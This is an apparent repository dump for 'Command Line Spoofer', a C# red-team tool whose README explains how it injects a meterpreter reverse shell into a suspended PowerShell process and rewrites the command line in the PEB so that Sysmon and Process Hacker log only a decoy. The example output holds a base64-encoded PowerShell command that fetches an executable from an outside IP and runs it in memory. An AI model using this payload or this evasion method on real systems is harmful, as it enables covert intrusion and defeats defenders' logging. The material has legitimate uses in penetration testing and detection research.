14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("5d03efc2-72e9-4410-b147-0a1a5c743999")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Command Line Spoofer
2 |
3 | An example of using C# to inject a meterpreter shell, whilst spoofing the command line. The command line is stored in the Process Environment Block, is logged when a new process starts, and is displayed in tools such as Process Hacker and Task Manager.
4 |
5 | # Introduction
6 | This code is based on the [How to Argue like Cobalt Strike](https://jhalon.github.io/utilizing-syscalls-in-csharp-1/) blog by **Adam Chester/XPN**, the blog explains how cobalt strike spoofs the command line of a process when injecting a beacon.
7 |
8 | I used this as a basis to create a C# version that spawns a PowerShell process and injects a meterpreter reverse shell. Granted there is no need for a .Net binary to do this but it demonstrates how commands can be spoofed.
9 |
10 | A new process is started in a suspended state with a spoofed command line argument.
11 |
12 | The spoofed command is logged but we are able to change the command line in the process PEB. When the main thread is resumed the process uses the new command line in the PEB.
13 |
14 | # Example
15 |
16 | Execution of the code is shown below:
17 |
18 | ```
19 | [+] Spoofing command: powershell.exe nothing to see here! :-P
20 | [+] Process spawned, PID: 8588
21 | [+] PEB Address: 0x2B2366F000
22 | [+] ProcessParameters Address: 0x1EF61560000
23 | [+] CommandLine Address: 0x1EF615606BC
24 | [+] Original CommandLine: powershell.exe nothing to see here! :-P
25 | [+] New CommandLine: powershell.exe -exec bypass -enc WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACgASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMgAyADgALwBwAC4AZQB4AGUAIgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQAuAEMAbwBuAHQAZQBuAHQAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAKAAsACAAWwBzAHQAcgBpAG4AZwBbAF0AXQAgACgAJwAxADkAMgAuADEANgA4AC4AMQAuADIAMgA4ACcALAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAUABJAEQALAAgACcAMQAwACcAKQApACkAOwB3AGgAaQBsAGUAIAAoACQAdAByAHUAZQApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAMAB9AA== , written to process
26 | [+] Resuming process
27 | ```
28 |
29 | This example injects a meterpreter reverse shell using PowerShell but it get's logged with a spoofed command line argument.
30 |
31 | # Proof of Concept
32 |
33 | Sysmon logs the original (spoofed) command line:
34 |
35 | 
36 |
37 | Process Hacker does not reveal the executed command:
38 |
39 | 
40 |
--------------------------------------------------------------------------------
/process_hacker.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/plackyhacker/CmdLineSpoofer/5ac8ebd2621d9fbd6d9e8f6a6c0c0f93a48ec9f8/process_hacker.png
--------------------------------------------------------------------------------
/sysmon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/plackyhacker/CmdLineSpoofer/5ac8ebd2621d9fbd6d9e8f6a6c0c0f93a48ec9f8/sysmon.png
--------------------------------------------------------------------------------